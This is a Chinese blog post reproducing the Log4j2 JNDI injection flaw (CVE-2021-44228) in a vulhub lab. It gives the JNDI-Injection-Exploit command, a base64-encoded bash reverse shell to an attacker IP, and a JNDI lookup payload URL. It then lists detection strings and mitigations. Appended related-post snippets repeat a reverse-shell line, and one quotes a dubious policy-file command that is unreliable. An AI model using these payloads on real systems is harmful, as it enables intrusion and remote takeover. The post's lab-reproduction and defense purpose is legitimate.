Log4j2 JNDI 注入漏洞(CVE-2021-44228)漏洞复现

已于 2023-10-19 17:14:35 修改
阅读量269 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: log4j web安全
于 2023-10-19 16:28:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54786196/article/details/133888712
版权
文章介绍了ApacheLog4j2中的JNDI注入漏洞,详细描述了环境搭建、利用JNDI注入工具实现远程代码执行的过程,并提供了判断攻击和防御方法,包括禁用lookup、拦截JNDI语句和升级组件版本等。
摘要由CSDN通过智能技术生成

一、前言

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

Log4j是什么?JNDI又是什么?

Log4j2是一个Java日志框架,用于在应用程序中记录和管理日志信息。Log4j2被广泛应用于Java项目中,帮助开发人员进行日志记录和故障排查。

JNDI,全称为Java命名和目录接口(Java Naming and Directory Interface),是SUN公司提供的一种标准的Java命名系统接口,允许从指定的远程服务器获取并加载对象。JNDI相当于一个用于映射的字典,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JNDI注入攻击时常用的就是通过RMI和LDAP两种服务,本文以LDAP服务为例进行复现
 

二、环境搭建

攻击机:192.168.233.144

靶机:192.168.233.129 搭建环境

用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

docker-compose up -d

查看端口

docker ps

发现开启的是8983,在浏览器上访问

​http://192.168.233.129:8983

三、利用JNDI注入工具

注入工具 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,项目地址:sayers522/JNDI-Injection-Exploit: JNDI命令注入利用 (github.com)

将代码下载到本地,解压后找到pom.xml文件所在目录

在目录栏输入cmd,回车

在cmd命令窗中输入

mvn clean package -DskipTests

build成功后,pom.xml目录会出现target目录文件夹

此时将我们的JNDI文件夹整个复制到攻击机,进入到target目录

打开终端,利用JNDI注入工具把这个反弹shell命令部署到LDAP服务上去,我们输入以下命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "构造反弹shell的命令的base64编码" -A "攻击机ip"

构造反弹shell的命令base64编码

#编码前:
bash -i >& /dev/tcp/192.168.233.144/6666 0>&1
#编码后::bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xNDQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

推荐一个编码网站

https://ares-x.com/tools/runtime-exec/


最终命令为

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xNDQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.233.144"

再开个窗口监听6666端口

我们随便复制一条紫色的代码

http://192.168.233.129:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com}

替换掉注入点中的代码

此时我们监听的端口,成功获得了反弹shell

可执行命令操作

这样就利用JNDI注入工具实现了攻击,复现了log4j的远程代码执行漏洞。

四、来自log4j攻击怎么判断?怎么防御?

排查是否受到了攻击:

检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。

如何对log4j2的攻击进行防御?
1.设置log4j2.formatMsgNoLookups=True。相当于直接禁止lookup查询出栈,也就不可能请求到访问到远程的恶意站点。
2.对包含有"jndi:ldap://"、"jndi:rmi//"这样字符串的请求进行拦截,即拦截JNDI语句来防止JNDI注入。
3.对系统进行合理配置,禁止不必要的业务访问外网,配置网络防火墙,禁止系统主动外连网络等等。
4.升级log4j2组件到新的安全的版本。

YiHua_yiye
关注
专栏目录
Log4j CVE-2021-44228 漏洞及Spring Boot解决方案
oscar999的专栏
12-17 2085
Log4j 的2 到 2.14 版本最近爆出了一个比较大的漏洞漏洞编号是CVE-2021-44228。本篇对该漏洞进行简单介绍, 并介绍Spring Boot项目如何解决该漏洞
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1414
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
log4j2 JNDI注入漏洞问题复现
逗神的博客
12-13 4697
log4j2 JNDI注入漏洞问题复现
JNDI-Injection-Exploit 使用教程
最新发布
gitblog_01056的博客
08-08 610
JNDI-Injection-Exploit 使用教程 JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https:/...
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3800
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
java asm jndi_JNDI-Injection-Exploit
weixin_29066121的博客
02-16 1393
介绍最近把自己之前写的JNDI注入工具改了一下push到了github,地址:github,启动后这个工具开启了三个服务,包括RMI、LDAP以及HTTP服务,然后生成JNDI链接。测试时可以将JNDI链接插入到JNDI注入相关的POC中,如Jackson、Fastjson反序列化漏洞等。三个服务中,RMI和LDAP基于marshalsec中RMIRefServer、LDAPRefServer类修...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6081
log4j 漏洞CVE-2021-44228 漏洞复现
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3218
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2352
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
JDK高版本下JNDI注入绕过
wfz2333的博客
05-22 1230
只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件比如yso中yso工具中已经集合了很多gadget chain本地利用yso的打rmi注册表的模块 此时在jdk1.7.0_21和jdk1.7.0_25以及jdk1.8.0上都可以成功,然而在一次攻击内网rmi服务的深思这篇文章中说到jdk8u121以后进行了一定的限制 jdk1.8.0_121测试如下:这种防御机制即JEP290,在jdk8u121提出的,简单来说就
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 2436
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
探索Java安全新边界:JNDI-Inject-Exploit
gitblog_00011的博客
05-19 354
探索Java安全新边界:JNDI-Inject-Exploit JNDI-Inject-Exploit解决FastJson、Jackson、Log4j2、原生JNDI注入漏洞的高版本JDKBypass利用,探测本地可用反序列化gadget达到命令执行、回显命令执行、内存马注入项目地址:https://gitcode.com/gh_mirrors/jn/JNDI-Inject-Exploit 1、...
JNDI-Injection-Exploit项目介绍
gitblog_00055的博客
03-23 364
JNDI-Injection-Exploit项目介绍 JNDI-Injection-ExploitJNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)项目地址:https://...
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
鸥鹭忘机
12-11 1万+
基本信息 漏洞编号:CVE-2021-44228 影响版本:2.x<=2.15.0-rc1 poc地址:https://gitee.com/lcosmos/apache-log4j-poc 在此十分感谢我的寝室长Cosmos提供的poc和技术支持。 原理简述 当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行。 漏洞
JNDI注入攻击工具JNDI-Injection-Exploit-Plus:深度解析与应用指南
gitblog_00020的博客
04-17 861
JNDI注入攻击工具JNDI-Injection-Exploit-Plus:深度解析与应用指南 JNDI-Injection-Exploit-Plus80+ Gadgets(30 More than ysoserial). JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and provide ba...
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值